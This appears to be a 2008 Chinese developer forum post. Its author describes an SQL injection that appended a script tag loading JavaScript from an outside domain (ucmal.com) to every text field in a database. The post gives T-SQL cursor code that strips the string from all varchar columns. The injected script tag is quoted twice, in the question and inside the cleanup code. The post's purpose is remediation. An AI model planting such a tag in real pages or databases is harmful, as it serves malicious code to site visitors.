数据库被注入攻击 所有文本型字下段数据都被加了

于 2008-12-13 12:39:00 发布
阅读量395 收藏
点赞数
文章标签: 数据库 command sql c
数据库被注入攻击  所有文本型字下段数据都被加了    <script_src=http://ucmal.com/0.js> </script>
怎么删掉?

SQL code 
   
   

    
    
    
    

    
    DECLARE
    
     
    
    @fieldtype
    
     sysname

    
    SET
    
     
    
    @fieldtype
    
    =
    
    '
    
    varchar
    
    '
    
    


    
    --
    
    删除处理
    
    

    
    DECLARE
    
     hCForEach 
    
    CURSOR
    
     GLOBAL

    
    FOR
    
    

    
    SELECT
    
     N
    
    '
    
    update 
    
    '
    
    +
    
    QUOTENAME
    
    (o.name)
    
    
    +
    
    N
    
    '
    
     set  
    
    '
    
    +
    
     
    
    QUOTENAME
    
    (c.name) 
    
    +
    
     N
    
    '
    
     = replace(
    
    '
    
     
    
    +
    
     
    
    QUOTENAME
    
    (c.name) 
    
    +
    
     
    
    '
    
    ,
    
    ''
    
    <script_src=http://ucmal.com/0.js> </script>
    
    ''
    
    ,
    
    ''''
    
    )
    
    '
    
    

    
    FROM
    
     sysobjects o,syscolumns c,systypes t

    
    WHERE
    
     o.id
    
    =
    
    c.id 
    
    
    AND
    
     
    
    OBJECTPROPERTY
    
    (o.id,N
    
    '
    
    IsUserTable
    
    '
    
    )
    
    =
    
    1
    
    
    
    
    AND
    
     c.xusertype
    
    =
    
    t.xusertype
    
    
    AND
    
     t.name
    
    =
    
    @fieldtype
    
    

    
    EXEC
    
     sp_MSforeach_Worker 
    
    @command1
    
    =
    
    N
    
    '
    
    ?
    
    '
ihaohaocom
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值